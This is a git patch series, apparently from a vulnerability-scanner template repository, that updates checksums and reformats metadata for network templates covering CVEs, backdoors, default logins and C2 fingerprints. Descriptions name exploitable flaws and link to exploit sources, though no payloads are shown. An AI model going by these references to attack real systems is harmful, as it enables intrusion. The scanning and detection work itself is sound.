+network/cves/2016/CVE-2016-2004.yaml:eaeffebb559fa76744fd7fd1b779b5e5521dbeb0 +network/cves/2016/CVE-2016-3510.yaml:ab649b2bd1a9eda70cb43d600b6320c45f01806e +network/cves/2017/CVE-2017-3881.yaml:b97e5e80d981cb76446c857d349e7d3fb63bd9a9 +network/cves/2017/CVE-2017-5645.yaml:385b1455ebbddb6136054cd2886c87f50818135d network/cves/2018/CVE-2018-2628.yaml:f823ce8c5d0f0f9947a5131c6fe61f0edd98ad0d -network/cves/2018/CVE-2018-2893.yaml:0747425f4e3eb128e08736b1aaca8872266c580d -network/cves/2020/CVE-2020-11981.yaml:6797dad5754668382eb920b2ac5c294da9398fa2 -network/cves/2020/CVE-2020-1938.yaml:87d1735c3efbd037c2c0669e4d6ef6d195858d12 -network/cves/2020/CVE-2020-7247.yaml:fc45c678e38dc35825a377e30e8ef66b9360c660 -network/cves/2021/CVE-2021-44521.yaml:40361b30bb6231972a24076b80cdb0ed85b05279 -network/cves/2022/CVE-2022-0543.yaml:a27a67b45dfceaef860fd6c59bd22394145882cb -network/cves/2022/CVE-2022-24706.yaml:4a036736022e99e18a148bd86a3894d95b151084 +network/cves/2018/CVE-2018-2893.yaml:99800642b6815c2ddd46dbdac4c51206b467271e +network/cves/2020/CVE-2020-11981.yaml:d73e69b51496835f55e58fabb67992aa6635203c +network/cves/2020/CVE-2020-1938.yaml:887bd58e985526a366f67962db239a627e9e5181 +network/cves/2020/CVE-2020-7247.yaml:9ed3065e9ee6c3f121fe08a6117d586ff352eb8c +network/cves/2021/CVE-2021-44521.yaml:2cc6438637f42c0e34ecc68f2459b050ededd971 +network/cves/2022/CVE-2022-0543.yaml:c9f0f01774372aae54622c97b9a68ce5997cc3b2 +network/cves/2022/CVE-2022-24706.yaml:3fcf75994b8852f37271048b9af452f602c79a95 network/cves/2022/CVE-2022-31793.yaml:ac870c80a1d17e215fc1357d257cdd07f2aca8da -network/cves/2023/CVE-2023-33246.yaml:cd9f687e6cb2d556fcf07482f242a3703180d023 -network/default-login/ftp-anonymous-login.yaml:a674622b755c4a2eb05e535f714ba90eaa1a9829 -network/default-login/ftp-weak-credentials.yaml:d4749ba120717dc1f34f263bc2d9413c2f9662d0 -network/default-login/ldap-anonymous-login.yaml:48fa5969a454ef01ca1cc73deb5423f764de8790 -network/detection/activemq-openwire-transport-detect.yaml:5341048ef6135611d6586414227704e61bf710eb -network/detection/apache-activemq-detect.yaml:96a3df34ded2f9707a536d0fc05eb0d7414749d2 -network/detection/axigen-mail-server-detect.yaml:f1316025d891e64008612574e3fd895bb7aca99f -network/detection/cisco-finger-detect.yaml:b276bbcf3d47e682f18155685150f07cedf698e5 -network/detection/clamav-detect.yaml:f856880b2fbc4d968e3bb45782c200277487e441 -network/detection/cql-native-transport.yaml:3d6e54aa9773e16aa2e9c75f61462bf1d45a8205 -network/detection/detect-addpac-voip-gateway.yaml:25eca59ccaf9984df28dd1c01dd4d58c67c23dfd -network/detection/detect-jabber-xmpp.yaml:8aa9448785a0dc82118ffc8b9af51e928cd60c60 -network/detection/dotnet-remoting-service-detect.yaml:fb9338dba6ec3d7e5cb5a97f220d451c33594c9c -network/detection/dropbear-cbc-ciphers.yaml:c9e37bbd3d8025d202c9871620fcf07ec5f3f389 -network/detection/esmtp-detect.yaml:a40b86cde437aad247271dbffb12fd488e3b097a -network/detection/expn-mail-detect.yaml:ea9b02907ca016b2f52e153cbdaab31777064c78 -network/detection/finger-detect.yaml:b633bc4e54f3cf5421cf90d17d607d502db8a6e5 -network/detection/gnu-inetutils-ftpd-detect.yaml:13032bebe217b19d1069ebb90b8855ad019fda28 -network/detection/gopher-detect.yaml:63356156c5578e594b630bc0e7b341ca2e12a30c -network/detection/ibm-d2b-database-server.yaml:7532b5b14424f0bfdeeac34f2883d1e958da3b3c -network/detection/imap-detect.yaml:792e8e90cc05dd94184c7e2e584f55a2e9d0d253 -network/detection/iplanet-imap-detect.yaml:797804466967f502f94cb46f786ea756640df995 +network/cves/2023/CVE-2023-33246.yaml:31795e9d41202a88961af586a1d947fa60d90246 +network/default-login/ftp-anonymous-login.yaml:20a6c899ab3d67d5e178c0d167d8fce637945c1a +network/default-login/ftp-weak-credentials.yaml:40ce5a09aff1c80a461d2acebb8cb3816bda9779 +network/default-login/ldap-anonymous-login.yaml:5ceeb7c64897a0469e3b9e5a2ec925567c0a8925 +network/detection/activemq-openwire-transport-detect.yaml:a2a7d1d1be98ebc53229cce7b9a75e0aefc516b2 +network/detection/apache-activemq-detect.yaml:15b56708cf6d6f8dca783cb40b6d3f9b1ffb765d +network/detection/axigen-mail-server-detect.yaml:658eaaf7b6ae1a881862207802800b3052d0324d +network/detection/cisco-finger-detect.yaml:b242374a1df790541b766f4f0e36666a2a7549c5 +network/detection/clamav-detect.yaml:8616e250aa69c74ff903919b6cff28a77c4ae075 +network/detection/cql-native-transport.yaml:ccd025169c99c719b79d13cf8b72a58559321a07 +network/detection/detect-addpac-voip-gateway.yaml:86931a2b160f7ffb63386c2add91b28f91648595 +network/detection/detect-jabber-xmpp.yaml:94388107835fcf3923fb0151ff02b4b9a35d829c +network/detection/dotnet-remoting-service-detect.yaml:ecae3ec87ce7d816448d05a5b611fcc4ce248407 +network/detection/dropbear-cbc-ciphers.yaml:896bdca3f90b65c9c6013438d67eb8c95389f6d8 +network/detection/esmtp-detect.yaml:470b3c4eecbc6946f1af9755fb0e934d91e2ab86 +network/detection/expn-mail-detect.yaml:e10d98af34370bdc982563d1878f8f558e197ecf +network/detection/finger-detect.yaml:eab8109135becb245495b39e84f6123721586bfd +network/detection/gnu-inetutils-ftpd-detect.yaml:c2e348774b35f11a845bcb7c2a726df335749b80 +network/detection/gopher-detect.yaml:3901b4cf94fbb3661b0aeb904a38f3f6b8194c80 +network/detection/ibm-d2b-database-server.yaml:9c219e670702e3369473a0c68fafbc8d75a87ab0 +network/detection/imap-detect.yaml:711c3da60996bbd7175b494caabb90523febbca4 +network/detection/iplanet-imap-detect.yaml:6252d0cd1de590c9de0ee8ac5bf9968d45b1234e network/detection/java-rmi-detect.yaml:d724183dc184431e03ed5c8274421665c7bda989 -network/detection/microsoft-ftp-service.yaml:92b1c3349e9f029e476f9d13798797fc45906ee4 -network/detection/mikrotik-ftp-server-detect.yaml:c43d32e0437d4e6b1188ad7fdce3ab17d4329938 -network/detection/mikrotik-routeros-api.yaml:cabbd4773b4fe9287d47cc42ea78d30c9562f1e3 -network/detection/mongodb-detect.yaml:2c765e6540b259f964bb53cb01ff81a64c80a78b -network/detection/msmq-detect.yaml:5d977a358a7a5bbc1837ce60bdc31af7df92d59b -network/detection/mysql-detect.yaml:4c716a0a7a60b45626cd756a2c949ca9e31439cb -network/detection/openssh-detect.yaml:84efaa8f67216536f0e879a983157f364c0c27de -network/detection/pgsql-detect.yaml:2d8931b96bf60405c27040a2b26fb8402ab524f9 -network/detection/pop3-detect.yaml:63f7b18a6aa15bf1ebb13c26a094c48b3607a203 -network/detection/proftpd-server-detect.yaml:0364267073c68f8c76a58c785b7295b7101aa87c -network/detection/rabbitmq-detect.yaml:4ea11fe71f516437ee18948bef434aafc57eca62 -network/detection/rdp-detect.yaml:eed3037c8e3caf6e57e40d767f2456e423e91384 -network/detection/redis-detect.yaml:55fb1ac0ec017cc8870f1ca389ba3e9284c414ce -network/detection/riak-detect.yaml:73cddd9093f8e8526acc0d9b9b5457306749ec34 -network/detection/rpcbind-portmapper-detect.yaml:64093f99eb18abeb9a85721e6a44b3a4d26d57e3 -network/detection/rsyncd-service-detect.yaml:5c3f80f8c0e34c9273c639b5083f044f1e16a5ea -network/detection/rtsp-detect.yaml:6ab1273e3c9a6bc2b7655ba3cc88ece640e5cd5c -network/detection/samba-detect.yaml:f9f2fdf3001bac13094a48958b3a32489d46564b -network/detection/sap-router.yaml:4d28d97202f3fdfa85d69a06b008d13ebd1e697c -network/detection/smb-detect.yaml:5e42e55f8f85322f4db93767ab90a895db57f76c -network/detection/smtp-detect.yaml:c059ef31c5bb6b3ecbff0fbe5e8283344b29ac27 -network/detection/sshd-dropbear-detect.yaml:7c972bdaa3dfbcd1173e3374998ff874f13d2da7 -network/detection/starttls-mail-detect.yaml:66fc7ae7adabd5060d46c12e42a1cab23d1ea933 -network/detection/teamspeak3-detect.yaml:cad767eb30c1407e7d8978102f7294b48f004378 -network/detection/telnet-detect.yaml:42d2d700d5d2505efe90dad20055132528312f13 -network/detection/totemomail-smtp-detect.yaml:59d077ac0097a20fd58a5cf017d54fd7481f278c -network/detection/vmware-authentication-daemon-detect.yaml:81fe7f8be7c047f43a06b421b8d6ef1b97e25e50 -network/detection/vnc-service-detect.yaml:75bdf9c29f7666004c92b3f7183dec085e8126df +network/detection/microsoft-ftp-service.yaml:e50fb87b704d9e1afca92335bff43102192c4ea4 +network/detection/mikrotik-ftp-server-detect.yaml:a044ce5ddf8d1511272d3be61e2a6ac1fae65dd9 +network/detection/mikrotik-routeros-api.yaml:39f157753ce8be7239d12494e5f7b458f79cf347 +network/detection/mongodb-detect.yaml:f2d353e05a121675c34ad57d7b75888342b2fa24 +network/detection/msmq-detect.yaml:4c3895d1a669b762a75ad31aac269090c48a55bf +network/detection/mysql-detect.yaml:e1bc919065aa2b6272dae784d33d77e0733757c8 +network/detection/openssh-detect.yaml:e4e89cbf2e5603105b2c106259ee6ed3ea5e907e +network/detection/pgsql-detect.yaml:b71235f0e0a89752d8a6529cfb2f6df7ac4dcec7 +network/detection/pop3-detect.yaml:4dfb3a5e10ac41f9d08912ce25e5895512f348a2 +network/detection/proftpd-server-detect.yaml:f8e31581df48389c3cdadcd7a1ed6d35adbe2099 +network/detection/rabbitmq-detect.yaml:69219a94f9425ecf96ee9e9678711cfcbd87b797 +network/detection/rdp-detect.yaml:86666e40065620d31395570f8d80e6adbe4dde3e +network/detection/redis-detect.yaml:7ef522d24e9e0914ff5367bc5fa42d1b46323fa4 +network/detection/riak-detect.yaml:547e4a1204dc2fde23d40e1bc162ab2a161bebc0 +network/detection/rpcbind-portmapper-detect.yaml:e81701b944f44e94cbe6f82e2c3ba4f71c3cb28c +network/detection/rsyncd-service-detect.yaml:007ce06c7619746977e4d4aacdb505397ff54376 +network/detection/rtsp-detect.yaml:41b325b0bedc536f795d5b108eab0809b5fb7645 +network/detection/samba-detect.yaml:1d01568e7fc2462ce96c515723afe281f5894171 +network/detection/sap-router.yaml:4f748f58cf50d3a389217e892eb7d8c9eed4c064 +network/detection/smb-detect.yaml:b0c061673b26b5a60fa6f2e0eb20de37c08ba66b +network/detection/smtp-detect.yaml:4cb698e3aef0566a80be0f15ad73d05d98dcc2f5 +network/detection/sshd-dropbear-detect.yaml:dc663f0b684b4c5a0443171ac324a65e88a91353 +network/detection/starttls-mail-detect.yaml:76b6099c08373bc8c49dc0bf4a67ee8598c7811b +network/detection/teamspeak3-detect.yaml:db3d1ee5ab40f3d460f4463329ab757152df6aa1 +network/detection/telnet-detect.yaml:8fbcde5667ca617d7e35844cc4573fc806470eb6 +network/detection/totemomail-smtp-detect.yaml:67399b872a46c4042a6d7cc2242fbda598fe80e1 +network/detection/vmware-authentication-daemon-detect.yaml:c3200055ad0072a42b7c7e67374d348f236b2ded +network/detection/vnc-service-detect.yaml:fe0054cc1b77b69404d2f446676403f252b82b98 network/detection/weblogic-iiop-detect.yaml:94b8c1aaec6ffabca45c86cfb25b3a609e30bdfe network/detection/weblogic-t3-detect.yaml:ce204c445556d0e1e07af1f6aaa65ee9c817d252 -network/detection/xlight-ftp-service-detect.yaml:709c4f6625b56fb99b25ba9992167c48b44a107d -network/enumeration/beanstalk-service.yaml:ff6de1500ec329dac7a3d24d8e92f9fe8518f1de -network/enumeration/kafka-topics-list.yaml:c169fb5b159e4ea9c9a86122afd1b0f0c4fa4943 -network/enumeration/mongodb-info-enum.yaml:137dd278383c71d517fc341a852fb786ace9daad -network/enumeration/niagara-fox-info-enum.yaml:4d28582676b275af6cadc3bc63ad5ba278bcf856 -network/enumeration/psql-user-enum.yaml:0a2f5b0095347687d51554f03cd5141463855dd0 -network/enumeration/smtp/smtp-user-enum.yaml:b87cdee6e50d171463194c28ab104f32f51a2f42 -network/enumeration/smtp-commands-enum.yaml:833575f9bd672a15739debf1aab8afdb547a0a43 -network/exposures/cisco-smi-exposure.yaml:22368c9dd2c17aa863f31268713da67650c498b1 -network/exposures/exposed-adb.yaml:51e6daeb3e5bed63b7d45f37e037e67e971adf16 -network/exposures/exposed-dockerd.yaml:0fbaae44d57f346911a4ebca079bcf165b8a4c85 -network/exposures/exposed-redis.yaml:e9480d8e9207c6e5933482cfcff732a8abb8b3a0 -network/exposures/exposed-zookeeper.yaml:44b26aa0b0b3bc628ff494ed455edd6043732d2a +network/detection/xlight-ftp-service-detect.yaml:df09822d9cc6fa1b1e4f7f99bbacfc9c24160159 +network/enumeration/beanstalk-service.yaml:6b761f32a18de725b06376576ad12d85a4ebf832 +network/enumeration/kafka-topics-list.yaml:c90f512f4ec006edc4c6986c0728015fa8525358 +network/enumeration/mongodb-info-enum.yaml:b77a072348b1dacf4f8d530063fd1e5f47cfea3a +network/enumeration/niagara-fox-info-enum.yaml:cd3fc20375db89c116c2c5dcb82e970c0ab3a73e +network/enumeration/psql-user-enum.yaml:c4c232dd301986d3c29e04e06748f57438fb1e0e +network/enumeration/smtp/smtp-user-enum.yaml:1d4749091fccd1b9fa25ee8b09f34c3b51592152 +network/enumeration/smtp-commands-enum.yaml:e28d80b6ecb2e283d43f58f74e3d1ba6c63455fb +network/exposures/cisco-smi-exposure.yaml:c760fcd32e21fc17283ed9a02c09a571a3680f29 +network/exposures/exposed-adb.yaml:52627ae57853ac9a610d3e789905bd2c557d9de4 +network/exposures/exposed-dockerd.yaml:a690f5be8036ac62769b004e1354f6638fcaa87b +network/exposures/exposed-redis.yaml:3887effd170b1f500a92bd2725b325d4d6b3ce05 +network/exposures/exposed-zookeeper.yaml:1b4fc1c2c6a2131c33a293a4655c4e0d3f4fe6b0 network/jarm/c2/cobalt-strike-c2-jarm.yaml:7bf85725d77f35262ff24b7678adc4461404b92e network/jarm/c2/covenant-c2-jarm.yaml:71fe7c9b7f6f7fbef263204bf701a6a5a513eb1f network/jarm/c2/deimos-c2-jarm.yaml:bcbf9501f84caefd8c9385a3575a3fb6c2fd4ce2 @@ -7153,22 +7153,22 @@ network/jarm/c2/posh-c2-jarm.yaml:06aa7bbb8f3cd637fde301b7eac9c83b68467f0c network/jarm/c2/shad0w-c2-jarm.yaml:21d654db72d9fbefa32a7ec40d4a77616aa4a43a network/jarm/c2/silenttrinity-c2-jarm.yaml:fdec712cc69eed900b0d7ba42187a0ea0e7bb95b network/jarm/c2/sliver-c2-jarm.yaml:dd41a2f23026cb1ce6fab8fb12f3e4a82a2accc3 -network/misconfig/apache-dubbo-unauth.yaml:09668afcc0c2b0182f0bf739cb077295a979c353 -network/misconfig/apache-rocketmq-broker-unauth.yaml:d9cfd62b876feabd3952ddc4eaa6c996eb4876bc -network/misconfig/clamav-unauth.yaml:559dfa23076118f5ce1d84ffd9a76efb5d1d4422 -network/misconfig/clickhouse-unauth.yaml:c47517fbfc5f4a0425f884c42ef218e776b92cbc -network/misconfig/dropbear-weakalgo.yaml:cf8685d87a0128c0a546c041633a1662d4e814f6 -network/misconfig/dropbear-weakmac.yaml:5e49047eec049df0930e0222b820268b2f346024 -network/misconfig/ganglia-xml-grid-monitor.yaml:62649538ea72479f23f8f454790b21388b8f56b6 -network/misconfig/memcached-stats.yaml:1d54fbf17762442553b9c16d16bf2776a42aa2b9 -network/misconfig/mongodb-unauth.yaml:2fd6f2959bb97ab660377dcfad6e9db4559b605e -network/misconfig/mysql-native-password.yaml:ef8676ebf814fe1084e81eeaf9bf70b999ff8b45 -network/misconfig/printers-info-leak.yaml:cb6c13a840a2765acf43726c754aa243b0101199 -network/misconfig/sap-router-info-leak.yaml:008df0e634639e012bd67b242172b20d93b92630 -network/misconfig/tidb-native-password.yaml:ee468366b1737d416807ecb51feae7b35ed27a4f -network/misconfig/tidb-unauth.yaml:98ce03032751882e00f5ea0880511d5aa356de74 -network/misconfig/unauth-psql.yaml:c54c9c89d460a71bc82267bd5737dbde45e53122 -network/vulnerabilities/clockwatch-enterprise-rce.yaml:fcfd279274514fa3474ff1b2d83f98c5463ff8c2 +network/misconfig/apache-dubbo-unauth.yaml:9fc2673de80d24caa065664242dfbd2eb1392eb4 +network/misconfig/apache-rocketmq-broker-unauth.yaml:aec4738a8ac3af859878ab933b173856d6c2be54 +network/misconfig/clamav-unauth.yaml:20adfce3848329dbb83e8f18a1e17ad8767f8ab8 +network/misconfig/clickhouse-unauth.yaml:4d0e9f50cdf7d2241db5ee84b8ccb207a46230c8 +network/misconfig/dropbear-weakalgo.yaml:27cdaa70b7fe79843b983b161e1fad88288a373b +network/misconfig/dropbear-weakmac.yaml:760914a845a37654688bae793af4a4201c389482 +network/misconfig/ganglia-xml-grid-monitor.yaml:fc9b7c0872ffc3a33b0f680e53c0e1f74fb15544 +network/misconfig/memcached-stats.yaml:29b5e7465487bcd2328367ddc9c57ae4b30abafc +network/misconfig/mongodb-unauth.yaml:1f53455484d54404a99989dd24d6c625018db29d +network/misconfig/mysql-native-password.yaml:dc73cd03694628961e4c23e897004316f93d0437 +network/misconfig/printers-info-leak.yaml:e2db9eb3ecff671c0c3f68f0d150e4970895c0ed +network/misconfig/sap-router-info-leak.yaml:ad7ae897ff318aa35b5191b6950022c9b17013ee +network/misconfig/tidb-native-password.yaml:5a201045c715852806eb2f11c2d7320f428fd104 +network/misconfig/tidb-unauth.yaml:a2ae3b64fb37d676ab8343b68c77f98c0855997b +network/misconfig/unauth-psql.yaml:eed9adc5419a909329f6f49eca32a1a1455963ee +network/vulnerabilities/clockwatch-enterprise-rce.yaml:eb8bd907db57a3f2c47999d0bc026d17550f4e0c ssl/c2/asyncrat-c2.yaml:cbc251e12a123f6f46296a76779cd952e0264f55 ssl/c2/bitrat-c2.yaml:c67772010d602be81f00f76493e5ce09c267496a ssl/c2/cobalt-strike-c2.yaml:fa3905fc13397006d2bdba8729cf4879f3ecf541 @@ -7195,7 +7195,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:61d84a877ff8fcbfad8135b36533649bd26beddd +templates-checksum.txt:3fa9d3f4155f376df13f89495d8c7b190ad97a68 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 627e654d30ee2e63b524e085222a4e429ebf6d21 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Sep 2023 13:29:58 +0000 Subject: [PATCH 23/23] TemplateMan Update [Wed Sep 27 13:29:58 UTC 2023] :robot: --- network/backdoor/backdoored-zte.yaml | 6 ++--- network/backdoor/vsftpd-backdoor.yaml | 8 +++---- network/cves/2001/CVE-2001-1473.yaml | 8 +++---- network/cves/2015/CVE-2015-3306.yaml | 8 +++---- network/cves/2016/CVE-2016-2004.yaml | 10 ++++----- network/cves/2016/CVE-2016-3510.yaml | 4 ++-- network/cves/2017/CVE-2017-3881.yaml | 8 +++---- network/cves/2017/CVE-2017-5645.yaml | 10 ++++----- network/cves/2018/CVE-2018-2893.yaml | 4 ++-- network/cves/2020/CVE-2020-11981.yaml | 4 ++-- network/cves/2020/CVE-2020-1938.yaml | 8 +++---- network/cves/2020/CVE-2020-7247.yaml | 8 +++---- network/cves/2021/CVE-2021-44521.yaml | 8 +++---- network/cves/2022/CVE-2022-0543.yaml | 8 +++---- network/cves/2022/CVE-2022-24706.yaml | 12 +++++----- network/cves/2023/CVE-2023-33246.yaml | 12 +++++----- .../default-login/ftp-anonymous-login.yaml | 8 +++---- .../default-login/ftp-weak-credentials.yaml | 6 ++--- .../default-login/ldap-anonymous-login.yaml | 4 ++-- .../activemq-openwire-transport-detect.yaml | 4 ++-- network/detection/apache-activemq-detect.yaml | 4 ++-- .../detection/axigen-mail-server-detect.yaml | 4 ++-- network/detection/cisco-finger-detect.yaml | 4 ++-- network/detection/clamav-detect.yaml | 4 ++-- network/detection/cql-native-transport.yaml | 4 ++-- .../detection/detect-addpac-voip-gateway.yaml | 5 ++--- network/detection/detect-jabber-xmpp.yaml | 5 ++--- .../dotnet-remoting-service-detect.yaml | 5 ++--- network/detection/dropbear-cbc-ciphers.yaml | 8 +++---- network/detection/esmtp-detect.yaml | 5 ++--- network/detection/expn-mail-detect.yaml | 4 ++-- network/detection/finger-detect.yaml | 4 ++-- .../detection/gnu-inetutils-ftpd-detect.yaml | 4 ++-- network/detection/gopher-detect.yaml | 5 ++--- .../detection/ibm-d2b-database-server.yaml | 5 ++--- network/detection/imap-detect.yaml | 5 ++--- network/detection/iplanet-imap-detect.yaml | 3 +-- network/detection/microsoft-ftp-service.yaml | 4 ++-- .../detection/mikrotik-ftp-server-detect.yaml | 4 ++-- network/detection/mikrotik-routeros-api.yaml | 5 ++--- network/detection/mongodb-detect.yaml | 11 +++++----- network/detection/msmq-detect.yaml | 6 ++--- network/detection/mysql-detect.yaml | 5 ++--- network/detection/openssh-detect.yaml | 11 +++++----- network/detection/pgsql-detect.yaml | 5 ++--- network/detection/pop3-detect.yaml | 5 ++--- network/detection/proftpd-server-detect.yaml | 4 ++-- network/detection/rabbitmq-detect.yaml | 4 ++-- network/detection/rdp-detect.yaml | 3 +-- network/detection/redis-detect.yaml | 2 +- network/detection/riak-detect.yaml | 4 ++-- .../detection/rpcbind-portmapper-detect.yaml | 5 ++--- network/detection/rsyncd-service-detect.yaml | 5 ++--- network/detection/rtsp-detect.yaml | 5 ++--- network/detection/samba-detect.yaml | 6 ++--- network/detection/sap-router.yaml | 4 ++-- network/detection/smb-detect.yaml | 4 ++-- network/detection/smtp-detect.yaml | 4 ++-- network/detection/sshd-dropbear-detect.yaml | 4 ++-- network/detection/starttls-mail-detect.yaml | 4 ++-- network/detection/teamspeak3-detect.yaml | 22 +++++++++---------- network/detection/telnet-detect.yaml | 4 ++-- network/detection/totemomail-smtp-detect.yaml | 4 ++-- .../vmware-authentication-daemon-detect.yaml | 4 ++-- network/detection/vnc-service-detect.yaml | 4 ++-- .../detection/xlight-ftp-service-detect.yaml | 4 ++-- network/enumeration/mongodb-info-enum.yaml | 5 ++--- .../enumeration/niagara-fox-info-enum.yaml | 8 +++---- network/enumeration/psql-user-enum.yaml | 2 +- network/enumeration/smtp-commands-enum.yaml | 4 ++-- network/enumeration/smtp/smtp-user-enum.yaml | 2 +- network/exposures/cisco-smi-exposure.yaml | 4 ++-- network/exposures/exposed-adb.yaml | 4 ++-- network/exposures/exposed-dockerd.yaml | 4 ++-- network/exposures/exposed-redis.yaml | 2 +- network/exposures/exposed-zookeeper.yaml | 4 ++-- network/misconfig/apache-dubbo-unauth.yaml | 2 +- .../apache-rocketmq-broker-unauth.yaml | 2 +- network/misconfig/clamav-unauth.yaml | 8 +++---- network/misconfig/clickhouse-unauth.yaml | 4 ++-- network/misconfig/dropbear-weakalgo.yaml | 8 +++---- network/misconfig/dropbear-weakmac.yaml | 8 +++---- .../misconfig/ganglia-xml-grid-monitor.yaml | 4 ++-- network/misconfig/memcached-stats.yaml | 4 ++-- network/misconfig/mongodb-unauth.yaml | 4 ++-- network/misconfig/mysql-native-password.yaml | 5 ++--- network/misconfig/sap-router-info-leak.yaml | 4 ++-- network/misconfig/tidb-native-password.yaml | 4 ++-- network/misconfig/tidb-unauth.yaml | 2 +- network/misconfig/unauth-psql.yaml | 2 +- .../clockwatch-enterprise-rce.yaml | 6 ++--- 91 files changed, 234 insertions(+), 254 deletions(-) diff --git a/network/backdoor/backdoored-zte.yaml b/network/backdoor/backdoored-zte.yaml index d9ffb84282..fe8cf86de6 100644 --- a/network/backdoor/backdoored-zte.yaml +++ b/network/backdoor/backdoored-zte.yaml @@ -10,12 +10,12 @@ info: - https://www.exploit-db.com/ghdb/7179 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-912 metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: http.html:"ZTE Corporation" + verified: true tags: edb,network,zte,telnet,backdoor,router tcp: diff --git a/network/backdoor/vsftpd-backdoor.yaml b/network/backdoor/vsftpd-backdoor.yaml index 764d4921c5..953a380eb8 100644 --- a/network/backdoor/vsftpd-backdoor.yaml +++ b/network/backdoor/vsftpd-backdoor.yaml @@ -7,14 +7,14 @@ info: description: VSFTPD 2.3.4 contains a backdoor command execution vulnerability. reference: - https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ + remediation: This backdoor was removed on July 3rd, 2011. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-78 - remediation: This backdoor was removed on July 3rd, 2011. - tags: network,vsftpd,ftp,backdoor metadata: - max-request: 2 + max-request: 1 + tags: network,vsftpd,ftp,backdoor tcp: - inputs: diff --git a/network/cves/2001/CVE-2001-1473.yaml b/network/cves/2001/CVE-2001-1473.yaml index 62af220d3f..003c9d7137 100644 --- a/network/cves/2001/CVE-2001-1473.yaml +++ b/network/cves/2001/CVE-2001-1473.yaml @@ -5,23 +5,23 @@ info: author: iamthefrogy severity: high description: SSHv1 is deprecated and has known cryptographic issues. - remediation: Upgrade to SSH 2.4 or later. reference: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 - http://www.kb.cert.org/vuls/id/684820 - https://exchange.xforce.ibmcloud.com/vulnerabilities/6603 + remediation: Upgrade to SSH 2.4 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2001-1473 cwe-id: CWE-310 - epss-score: 0.00258 cpe: cpe:2.3:a:ssh:ssh:1.2.24:*:*:*:*:*:*:* + epss-score: 0.00258 metadata: - max-request: 2 - vendor: ssh + max-request: 1 product: ssh + vendor: ssh tags: cve,cve2001,network,ssh,openssh tcp: - host: diff --git a/network/cves/2015/CVE-2015-3306.yaml b/network/cves/2015/CVE-2015-3306.yaml index 8a97fba2e3..8befb7bc1e 100644 --- a/network/cves/2015/CVE-2015-3306.yaml +++ b/network/cves/2015/CVE-2015-3306.yaml @@ -5,24 +5,24 @@ info: author: pdteam severity: critical description: ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands. - remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later. reference: - https://github.com/t0kx/exploit-CVE-2015-3306 - https://www.exploit-db.com/exploits/36803/ - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html - https://nvd.nist.gov/vuln/detail/CVE-2015-3306 + remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C cvss-score: 10 cve-id: CVE-2015-3306 cwe-id: CWE-284 - epss-score: 0.97267 cpe: cpe:2.3:a:proftpd:proftpd:1.3.5:*:*:*:*:*:*:* + epss-score: 0.97267 metadata: - max-request: 2 - vendor: proftpd + max-request: 1 product: proftpd + vendor: proftpd tags: cve,cve2015,ftp,rce,network,proftpd,edb tcp: - host: diff --git a/network/cves/2016/CVE-2016-2004.yaml b/network/cves/2016/CVE-2016-2004.yaml index 4b21aaedbf..0237cae97a 100644 --- a/network/cves/2016/CVE-2016-2004.yaml +++ b/network/cves/2016/CVE-2016-2004.yaml @@ -5,25 +5,25 @@ info: author: pussycat0x severity: critical description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623. - remediation: | - Upgrade to the most recent version of HP Data Protector. reference: - https://www.exploit-db.com/exploits/39858 - https://nvd.nist.gov/vuln/detail/CVE-2016-2004 - http://www.kb.cert.org/vuls/id/267328 - https://www.exploit-db.com/exploits/39858/ - http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html + remediation: | + Upgrade to the most recent version of HP Data Protector. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-2004 cwe-id: CWE-306 - epss-score: 0.06793 cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:* + epss-score: 0.06793 metadata: - max-request: 2 - vendor: hp + max-request: 1 product: data_protector + vendor: hp tags: cve,cve2016,network,iot,hp,rce,edb tcp: - host: diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml index e8ed87a996..388c7a716b 100644 --- a/network/cves/2016/CVE-2016-3510.yaml +++ b/network/cves/2016/CVE-2016-3510.yaml @@ -15,9 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2016-3510 cwe-id: CWE-119 - epss-score: 0.0162000000 + epss-score: 0.0162 metadata: - max-request: 2 + max-request: 1 verified: true tags: cve,cve2016,weblogic,t3,rce,oast,deserialization,network diff --git 